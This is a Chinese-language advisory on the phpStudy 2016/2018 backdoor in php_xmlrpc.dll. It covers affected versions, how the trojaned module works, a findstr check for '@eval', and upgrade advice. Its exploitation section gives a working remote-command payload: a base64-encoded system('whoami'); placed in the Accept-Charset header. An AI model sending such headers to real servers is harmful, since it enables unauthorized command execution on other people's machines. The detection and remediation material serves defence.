PHPstudy 后门漏洞

PHPstudy 后门

漏洞概述

phpStudy是国内一款免费PHP调试环境的程序集成包，能用来进行PHP 环境的调试和开发。
此漏洞可被利用执行命令。

涉及版本

phpStudy2016、phpStudy2018的部分版本

后门涉及部分

后门代码存在于\ext\php_xmlrpc.dll模块中，官网版本中默认xmplrpc模块的几个初始化函数都是被设置为NULL；被植入木马后的xmplrpc模块的函数被自定义，所有请求都会经过自定义函数。

至少有2个版本：

phpStudy2016和phpStudy2018自带的php-5.2.17、php-5.4.45

phpStudy20161103
php\php-5.2.17\ext\php_xmlrpc.dllphp\
php-5.4.45\ext\php_xmlrpc.dll

phpStudy20180211
PHPTutorial\php\php-5.2.17\ext\php_xmlrpc.dll
PHPTutorial\php\php-5.4.45\ext\php_xmlrpc.dll

利用方法

将要执行的命令base 64编码后写在请求包的Accept-charset中

• 注意 gzip,deflate中间逗号无空格

举例：
Accept-Encoding: gzip,deflate
accept-charset: c3lzdGVtKCd3aG9hbWknKTs=

排查方法

用户可以通过搜索php_xmlrpc.dll模块中包含“@eval”关键字快速判断是否是存在后门的版本
命令参考：

findstr /m /s /c:"@eval"  *.*

实例

• url：http://host/
• 请求包如下，将命令system(‘whoami’);进行base64编码后，放入参数中进行请求。

1. whoami （查看当前身份）
   

2. cd (查看当前目录）

• 注意：使用请求包中自带的Accept-Encoding值时，记得将gzip,deflate逗号后的空格清空：

建议

建议用户在官方 https://www.xp.cn/ 下载安装最新版本。

参考文章

https://mp.weixin.qq.com/s/dTzWfYGdkNqEl0vd72oC2w